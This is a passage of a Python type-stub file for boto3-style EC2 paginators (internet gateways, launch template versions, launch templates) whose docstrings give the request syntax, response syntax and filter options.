* ``group-name`` - The name of the security group for the instance. EC2-Classic only.
* ``hibernation-options.configured`` - A Boolean that indicates whether the instance is enabled for hibernation. A value of ``true`` means that the instance is enabled for hibernation.
* ``host-id`` - The ID of the Dedicated Host on which the instance is running, if applicable.
* ``hypervisor`` - The hypervisor type of the instance (``ovm`` | ``xen`` ).
* ``iam-instance-profile.arn`` - The instance profile associated with the instance. Specified as an ARN.
* ``image-id`` - The ID of the image used to launch the instance.
* ``instance-id`` - The ID of the instance.
* ``instance-lifecycle`` - Indicates whether this is a Spot Instance or a Scheduled Instance (``spot`` | ``scheduled`` ).
* ``instance-state-code`` - The state of the instance, as a 16-bit unsigned integer. The high byte is used for internal purposes and should be ignored. The low byte is set based on the state represented. The valid values are: 0 (pending), 16 (running), 32 (shutting-down), 48 (terminated), 64 (stopping), and 80 (stopped).
* ``instance-state-name`` - The state of the instance (``pending`` | ``running`` | ``shutting-down`` | ``terminated`` | ``stopping`` | ``stopped`` ).
* ``instance-type`` - The type of instance (for example, ``t2.micro`` ).
* ``instance.group-id`` - The ID of the security group for the instance.
* ``instance.group-name`` - The name of the security group for the instance.
* ``ip-address`` - The public IPv4 address of the instance.
* ``kernel-id`` - The kernel ID.
* ``key-name`` - The name of the key pair used when the instance was launched.
* ``launch-index`` - When launching multiple instances, this is the index for the instance in the launch group (for example, 0, 1, 2, and so on).
* ``launch-time`` - The time when the instance was launched.
* ``monitoring-state`` - Indicates whether detailed monitoring is enabled (``disabled`` | ``enabled`` ).
* ``network-interface.addresses.private-ip-address`` - The private IPv4 address associated with the network interface.
* ``network-interface.addresses.primary`` - Specifies whether the IPv4 address of the network interface is the primary private IPv4 address.
* ``network-interface.addresses.association.public-ip`` - The ID of the association of an Elastic IP address (IPv4) with a network interface.
* ``network-interface.addresses.association.ip-owner-id`` - The owner ID of the private IPv4 address associated with the network interface.
* ``network-interface.association.public-ip`` - The address of the Elastic IP address (IPv4) bound to the network interface.
* ``network-interface.association.ip-owner-id`` - The owner of the Elastic IP address (IPv4) associated with the network interface.
* ``network-interface.association.allocation-id`` - The allocation ID returned when you allocated the Elastic IP address (IPv4) for your network interface.
* ``network-interface.association.association-id`` - The association ID returned when the network interface was associated with an IPv4 address.
* ``network-interface.attachment.attachment-id`` - The ID of the interface attachment.
* ``network-interface.attachment.instance-id`` - The ID of the instance to which the network interface is attached.
* ``network-interface.attachment.instance-owner-id`` - The owner ID of the instance to which the network interface is attached.
* ``network-interface.attachment.device-index`` - The device index to which the network interface is attached.
* ``network-interface.attachment.status`` - The status of the attachment (``attaching`` | ``attached`` | ``detaching`` | ``detached`` ).
* ``network-interface.attachment.attach-time`` - The time that the network interface was attached to an instance.
* ``network-interface.attachment.delete-on-termination`` - Specifies whether the attachment is deleted when an instance is terminated.
* ``network-interface.availability-zone`` - The Availability Zone for the network interface.
* ``network-interface.description`` - The description of the network interface.
* ``network-interface.group-id`` - The ID of a security group associated with the network interface.
* ``network-interface.group-name`` - The name of a security group associated with the network interface.
* ``network-interface.ipv6-addresses.ipv6-address`` - The IPv6 address associated with the network interface.
* ``network-interface.mac-address`` - The MAC address of the network interface.
* ``network-interface.network-interface-id`` - The ID of the network interface.
* ``network-interface.owner-id`` - The ID of the owner of the network interface.
* ``network-interface.private-dns-name`` - The private DNS name of the network interface.
* ``network-interface.requester-id`` - The requester ID for the network interface.
* ``network-interface.requester-managed`` - Indicates whether the network interface is being managed by AWS.
* ``network-interface.status`` - The status of the network interface (``available`` ) | ``in-use`` ).
* ``network-interface.source-dest-check`` - Whether the network interface performs source/destination checking. A value of ``true`` means that checking is enabled, and ``false`` means that checking is disabled. The value must be ``false`` for the network interface to perform network address translation (NAT) in your VPC.
* ``network-interface.subnet-id`` - The ID of the subnet for the network interface.
* ``network-interface.vpc-id`` - The ID of the VPC for the network interface.
* ``owner-id`` - The AWS account ID of the instance owner.
* ``placement-group-name`` - The name of the placement group for the instance.
* ``placement-partition-number`` - The partition in which the instance is located.
* ``platform`` - The platform. To list only Windows instances, use ``windows`` .
* ``private-dns-name`` - The private IPv4 DNS name of the instance.
* ``private-ip-address`` - The private IPv4 address of the instance.
* ``product-code`` - The product code associated with the AMI used to launch the instance.
* ``product-code.type`` - The type of product code (``devpay`` | ``marketplace`` ).
* ``ramdisk-id`` - The RAM disk ID.
* ``reason`` - The reason for the current state of the instance (for example, shows \"User Initiated [date]\" when you stop or terminate the instance). Similar to the state-reason-code filter.
* ``requester-id`` - The ID of the entity that launched the instance on your behalf (for example, AWS Management Console, Auto Scaling, and so on).
* ``reservation-id`` - The ID of the instance\'s reservation. A reservation ID is created any time you launch an instance. A reservation ID has a one-to-one relationship with an instance launch request, but can be associated with more than one instance if you launch multiple instances using the same launch request. For example, if you launch one instance, you get one reservation ID. If you launch ten instances using the same launch request, you also get one reservation ID.
* ``root-device-name`` - The device name of the root device volume (for example, ``/dev/sda1`` ).
* ``root-device-type`` - The type of the root device volume (``ebs`` | ``instance-store`` ).
* ``source-dest-check`` - Indicates whether the instance performs source/destination checking. A value of ``true`` means that checking is enabled, and ``false`` means that checking is disabled. The value must be ``false`` for the instance to perform network address translation (NAT) in your VPC.
* ``spot-instance-request-id`` - The ID of the Spot Instance request.
* ``state-reason-code`` - The reason code for the state change.
* ``state-reason-message`` - A message that describes the state change.
* ``subnet-id`` - The ID of the subnet for the instance.
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources that have a tag with a specific key, regardless of the tag value.
* ``tenancy`` - The tenancy of an instance (``dedicated`` | ``default`` | ``host`` ).
* ``virtualization-type`` - The virtualization type of the instance (``paravirtual`` | ``hvm`` ).
* ``vpc-id`` - The ID of the VPC that the instance is running in.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type InstanceIds: list
:param InstanceIds:
The instance IDs.
Default: Describes all your instances.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeInternetGateways(Paginator):
def paginate(self, Filters: List = None, DryRun: bool = None, InternetGatewayIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_internet_gateways`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeInternetGateways>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
InternetGatewayIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'InternetGateways': [
{
'Attachments': [
{
'State': 'attaching'|'attached'|'detaching'|'detached',
'VpcId': 'string'
},
],
'InternetGatewayId': 'string',
'OwnerId': 'string',
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **InternetGateways** *(list) --*
Information about one or more internet gateways.
- *(dict) --*
Describes an internet gateway.
- **Attachments** *(list) --*
Any VPCs attached to the internet gateway.
- *(dict) --*
Describes the attachment of a VPC to an internet gateway or an egress-only internet gateway.
- **State** *(string) --*
The current state of the attachment. For an internet gateway, the state is ``available`` when attached to a VPC; otherwise, this value is not returned.
- **VpcId** *(string) --*
The ID of the VPC.
- **InternetGatewayId** *(string) --*
The ID of the internet gateway.
- **OwnerId** *(string) --*
The ID of the AWS account that owns the internet gateway.
- **Tags** *(list) --*
Any tags assigned to the internet gateway.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
:type Filters: list
:param Filters:
One or more filters.
* ``attachment.state`` - The current state of the attachment between the gateway and the VPC (``available`` ). Present only if a VPC is attached.
* ``attachment.vpc-id`` - The ID of an attached VPC.
* ``internet-gateway-id`` - The ID of the Internet gateway.
* ``owner-id`` - The ID of the AWS account that owns the internet gateway.
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type InternetGatewayIds: list
:param InternetGatewayIds:
One or more internet gateway IDs.
Default: Describes all your internet gateways.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeLaunchTemplateVersions(Paginator):
def paginate(self, DryRun: bool = None, LaunchTemplateId: str = None, LaunchTemplateName: str = None, Versions: List = None, MinVersion: str = None, MaxVersion: str = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_launch_template_versions`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeLaunchTemplateVersions>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
LaunchTemplateId='string',
LaunchTemplateName='string',
Versions=[
'string',
],
MinVersion='string',
MaxVersion='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'LaunchTemplateVersions': [
{
'LaunchTemplateId': 'string',
'LaunchTemplateName': 'string',
'VersionNumber': 123,
'VersionDescription': 'string',
'CreateTime': datetime(2015, 1, 1),
'CreatedBy': 'string',
'DefaultVersion': True|False,
'LaunchTemplateData': {
'KernelId': 'string',
'EbsOptimized': True|False,
'IamInstanceProfile': {
'Arn': 'string',
'Name': 'string'
},
'BlockDeviceMappings': [
{
'DeviceName': 'string',
'VirtualName': 'string',
'Ebs': {
'Encrypted': True|False,
'DeleteOnTermination': True|False,
'Iops': 123,
'KmsKeyId': 'string',
'SnapshotId': 'string',
'VolumeSize': 123,
'VolumeType': 'standard'|'io1'|'gp2'|'sc1'|'st1'
},
'NoDevice': 'string'
},
],
'NetworkInterfaces': [
{
'AssociatePublicIpAddress': True|False,
'DeleteOnTermination': True|False,
'Description': 'string',
'DeviceIndex': 123,
'Groups': [
'string',
],
'InterfaceType': 'string',
'Ipv6AddressCount': 123,
'Ipv6Addresses': [
{
'Ipv6Address': 'string'
},
],
'NetworkInterfaceId': 'string',
'PrivateIpAddress': 'string',
'PrivateIpAddresses': [
{
'Primary': True|False,
'PrivateIpAddress': 'string'
},
],
'SecondaryPrivateIpAddressCount': 123,
'SubnetId': 'string'
},
],
'ImageId': 'string',
'InstanceType': 't1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.large'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
'KeyName': 'string',
'Monitoring': {
'Enabled': True|False
},
'Placement': {
'AvailabilityZone': 'string',
'Affinity': 'string',
'GroupName': 'string',
'HostId': 'string',
'Tenancy': 'default'|'dedicated'|'host',
'SpreadDomain': 'string'
},
'RamDiskId': 'string',
'DisableApiTermination': True|False,
'InstanceInitiatedShutdownBehavior': 'stop'|'terminate',
'UserData': 'string',
'TagSpecifications': [
{
'ResourceType': 'client-vpn-endpoint'|'customer-gateway'|'dedicated-host'|'dhcp-options'|'elastic-ip'|'fleet'|'fpga-image'|'host-reservation'|'image'|'instance'|'internet-gateway'|'launch-template'|'natgateway'|'network-acl'|'network-interface'|'reserved-instances'|'route-table'|'security-group'|'snapshot'|'spot-instances-request'|'subnet'|'transit-gateway'|'transit-gateway-attachment'|'transit-gateway-route-table'|'volume'|'vpc'|'vpc-peering-connection'|'vpn-connection'|'vpn-gateway',
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
],
'ElasticGpuSpecifications': [
{
'Type': 'string'
},
],
'ElasticInferenceAccelerators': [
{
'Type': 'string'
},
],
'SecurityGroupIds': [
'string',
],
'SecurityGroups': [
'string',
],
'InstanceMarketOptions': {
'MarketType': 'spot',
'SpotOptions': {
'MaxPrice': 'string',
'SpotInstanceType': 'one-time'|'persistent',
'BlockDurationMinutes': 123,
'ValidUntil': datetime(2015, 1, 1),
'InstanceInterruptionBehavior': 'hibernate'|'stop'|'terminate'
}
},
'CreditSpecification': {
'CpuCredits': 'string'
},
'CpuOptions': {
'CoreCount': 123,
'ThreadsPerCore': 123
},
'CapacityReservationSpecification': {
'CapacityReservationPreference': 'open'|'none',
'CapacityReservationTarget': {
'CapacityReservationId': 'string'
}
},
'LicenseSpecifications': [
{
'LicenseConfigurationArn': 'string'
},
],
'HibernationOptions': {
'Configured': True|False
}
}
},
],
}
**Response Structure**
- *(dict) --*
- **LaunchTemplateVersions** *(list) --*
Information about the launch template versions.
- *(dict) --*
Describes a launch template version.
- **LaunchTemplateId** *(string) --*
The ID of the launch template.
- **LaunchTemplateName** *(string) --*
The name of the launch template.
- **VersionNumber** *(integer) --*
The version number.
- **VersionDescription** *(string) --*
The description for the version.
- **CreateTime** *(datetime) --*
The time the version was created.
- **CreatedBy** *(string) --*
The principal that created the version.
- **DefaultVersion** *(boolean) --*
Indicates whether the version is the default version.
- **LaunchTemplateData** *(dict) --*
Information about the launch template.
- **KernelId** *(string) --*
The ID of the kernel, if applicable.
- **EbsOptimized** *(boolean) --*
Indicates whether the instance is optimized for Amazon EBS I/O.
- **IamInstanceProfile** *(dict) --*
The IAM instance profile.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of the instance profile.
- **Name** *(string) --*
The name of the instance profile.
- **BlockDeviceMappings** *(list) --*
The block device mappings.
- *(dict) --*
Describes a block device mapping.
- **DeviceName** *(string) --*
The device name.
- **VirtualName** *(string) --*
The virtual device name (ephemeralN).
- **Ebs** *(dict) --*
Information about the block device for an EBS volume.
- **Encrypted** *(boolean) --*
Indicates whether the EBS volume is encrypted.
- **DeleteOnTermination** *(boolean) --*
Indicates whether the EBS volume is deleted on instance termination.
- **Iops** *(integer) --*
The number of I/O operations per second (IOPS) that the volume supports.
- **KmsKeyId** *(string) --*
The ARN of the AWS Key Management Service (AWS KMS) CMK used for encryption.
- **SnapshotId** *(string) --*
The ID of the snapshot.
- **VolumeSize** *(integer) --*
The size of the volume, in GiB.
- **VolumeType** *(string) --*
The volume type.
- **NoDevice** *(string) --*
Suppresses the specified device included in the block device mapping of the AMI.
- **NetworkInterfaces** *(list) --*
The network interfaces.
- *(dict) --*
Describes a network interface.
- **AssociatePublicIpAddress** *(boolean) --*
Indicates whether to associate a public IPv4 address with eth0 for a new network interface.
- **DeleteOnTermination** *(boolean) --*
Indicates whether the network interface is deleted when the instance is terminated.
- **Description** *(string) --*
A description for the network interface.
- **DeviceIndex** *(integer) --*
The device index for the network interface attachment.
- **Groups** *(list) --*
The IDs of one or more security groups.
- *(string) --*
- **InterfaceType** *(string) --*
The type of network interface.
- **Ipv6AddressCount** *(integer) --*
The number of IPv6 addresses for the network interface.
- **Ipv6Addresses** *(list) --*
The IPv6 addresses for the network interface.
- *(dict) --*
Describes an IPv6 address.
- **Ipv6Address** *(string) --*
The IPv6 address.
- **NetworkInterfaceId** *(string) --*
The ID of the network interface.
- **PrivateIpAddress** *(string) --*
The primary private IPv4 address of the network interface.
- **PrivateIpAddresses** *(list) --*
One or more private IPv4 addresses.
- *(dict) --*
Describes a secondary private IPv4 address for a network interface.
- **Primary** *(boolean) --*
Indicates whether the private IPv4 address is the primary private IPv4 address. Only one IPv4 address can be designated as primary.
- **PrivateIpAddress** *(string) --*
The private IPv4 addresses.
- **SecondaryPrivateIpAddressCount** *(integer) --*
The number of secondary private IPv4 addresses for the network interface.
- **SubnetId** *(string) --*
The ID of the subnet for the network interface.
- **ImageId** *(string) --*
The ID of the AMI that was used to launch the instance.
- **InstanceType** *(string) --*
The instance type.
- **KeyName** *(string) --*
The name of the key pair.
- **Monitoring** *(dict) --*
The monitoring for the instance.
- **Enabled** *(boolean) --*
Indicates whether detailed monitoring is enabled. Otherwise, basic monitoring is enabled.
- **Placement** *(dict) --*
The placement of the instance.
- **AvailabilityZone** *(string) --*
The Availability Zone of the instance.
- **Affinity** *(string) --*
The affinity setting for the instance on the Dedicated Host.
- **GroupName** *(string) --*
The name of the placement group for the instance.
- **HostId** *(string) --*
The ID of the Dedicated Host for the instance.
- **Tenancy** *(string) --*
The tenancy of the instance (if the instance is running in a VPC). An instance with a tenancy of ``dedicated`` runs on single-tenant hardware.
- **SpreadDomain** *(string) --*
Reserved for future use.
- **RamDiskId** *(string) --*
The ID of the RAM disk, if applicable.
- **DisableApiTermination** *(boolean) --*
If set to ``true`` , indicates that the instance cannot be terminated using the Amazon EC2 console, command line tool, or API.
- **InstanceInitiatedShutdownBehavior** *(string) --*
Indicates whether an instance stops or terminates when you initiate shutdown from the instance (using the operating system command for system shutdown).
- **UserData** *(string) --*
The user data for the instance.
- **TagSpecifications** *(list) --*
The tags.
- *(dict) --*
The tag specification for the launch template.
- **ResourceType** *(string) --*
The type of resource.
- **Tags** *(list) --*
The tags for the resource.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
- **ElasticGpuSpecifications** *(list) --*
The elastic GPU specification.
- *(dict) --*
Describes an elastic GPU.
- **Type** *(string) --*
The elastic GPU type.
- **ElasticInferenceAccelerators** *(list) --*
The elastic inference accelerator for the instance.
- *(dict) --*
Describes an elastic inference accelerator.
- **Type** *(string) --*
The type of elastic inference accelerator. The possible values are eia1.medium, eia1.large, and eia1.xlarge.
- **SecurityGroupIds** *(list) --*
The security group IDs.
- *(string) --*
- **SecurityGroups** *(list) --*
The security group names.
- *(string) --*
- **InstanceMarketOptions** *(dict) --*
The market (purchasing) option for the instances.
- **MarketType** *(string) --*
The market type.
- **SpotOptions** *(dict) --*
The options for Spot Instances.
- **MaxPrice** *(string) --*
The maximum hourly price you're willing to pay for the Spot Instances.
- **SpotInstanceType** *(string) --*
The Spot Instance request type.
- **BlockDurationMinutes** *(integer) --*
The required duration for the Spot Instances (also known as Spot blocks), in minutes. This value must be a multiple of 60 (60, 120, 180, 240, 300, or 360).
- **ValidUntil** *(datetime) --*
The end date of the request. For a one-time request, the request remains active until all instances launch, the request is canceled, or this date is reached. If the request is persistent, it remains active until it is canceled or this date and time is reached.
- **InstanceInterruptionBehavior** *(string) --*
The behavior when a Spot Instance is interrupted.
- **CreditSpecification** *(dict) --*
The credit option for CPU usage of the instance.
- **CpuCredits** *(string) --*
The credit option for CPU usage of a T2 or T3 instance. Valid values are ``standard`` and ``unlimited`` .
- **CpuOptions** *(dict) --*
The CPU options for the instance. For more information, see `Optimizing CPU Options <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-optimize-cpu.html>`__ in the *Amazon Elastic Compute Cloud User Guide* .
- **CoreCount** *(integer) --*
The number of CPU cores for the instance.
- **ThreadsPerCore** *(integer) --*
The number of threads per CPU core.
- **CapacityReservationSpecification** *(dict) --*
Information about the Capacity Reservation targeting option.
- **CapacityReservationPreference** *(string) --*
Indicates the instance's Capacity Reservation preferences. Possible preferences include:
* ``open`` - The instance can run in any ``open`` Capacity Reservation that has matching attributes (instance type, platform, Availability Zone).
* ``none`` - The instance avoids running in a Capacity Reservation even if one is available. The instance runs in On-Demand capacity.
- **CapacityReservationTarget** *(dict) --*
Information about the target Capacity Reservation.
- **CapacityReservationId** *(string) --*
The ID of the Capacity Reservation.
- **LicenseSpecifications** *(list) --*
The license configurations.
- *(dict) --*
Describes a license configuration.
- **LicenseConfigurationArn** *(string) --*
The Amazon Resource Name (ARN) of the license configuration.
- **HibernationOptions** *(dict) --*
Indicates whether an instance is configured for hibernation. For more information, see `Hibernate Your Instance <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/Hibernate.html>`__ in the *Amazon Elastic Compute Cloud User Guide* .
- **Configured** *(boolean) --*
If this parameter is set to ``true`` , the instance is enabled for hibernation; otherwise, it is not enabled for hibernation.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type LaunchTemplateId: string
:param LaunchTemplateId:
The ID of the launch template. You must specify either the launch template ID or launch template name in the request.
:type LaunchTemplateName: string
:param LaunchTemplateName:
The name of the launch template. You must specify either the launch template ID or launch template name in the request.
:type Versions: list
:param Versions:
One or more versions of the launch template.
- *(string) --*
:type MinVersion: string
:param MinVersion:
The version number after which to describe launch template versions.
:type MaxVersion: string
:param MaxVersion:
The version number up to which to describe launch template versions.
:type Filters: list
:param Filters:
One or more filters.
* ``create-time`` - The time the launch template version was created.
* ``ebs-optimized`` - A boolean that indicates whether the instance is optimized for Amazon EBS I/O.
* ``iam-instance-profile`` - The ARN of the IAM instance profile.
* ``image-id`` - The ID of the AMI.
* ``instance-type`` - The instance type.
* ``is-default-version`` - A boolean that indicates whether the launch template version is the default version.
* ``kernel-id`` - The kernel ID.
* ``ram-disk-id`` - The RAM disk ID.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeLaunchTemplates(Paginator):
def paginate(self, DryRun: bool = None, LaunchTemplateIds: List = None, LaunchTemplateNames: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_launch_templates`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeLaunchTemplates>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
LaunchTemplateIds=[
'string',
],
LaunchTemplateNames=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'LaunchTemplates': [
{
'LaunchTemplateId': 'string',
'LaunchTemplateName': 'string',
'CreateTime': datetime(2015, 1, 1),
'CreatedBy': 'string',
'DefaultVersionNumber': 123,
'LatestVersionNumber': 123,
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **LaunchTemplates** *(list) --*
Information about the launch templates.
- *(dict) --*
Describes a launch template.
- **LaunchTemplateId** *(string) --*
The ID of the launch template.
- **LaunchTemplateName** *(string) --*
The name of the launch template.
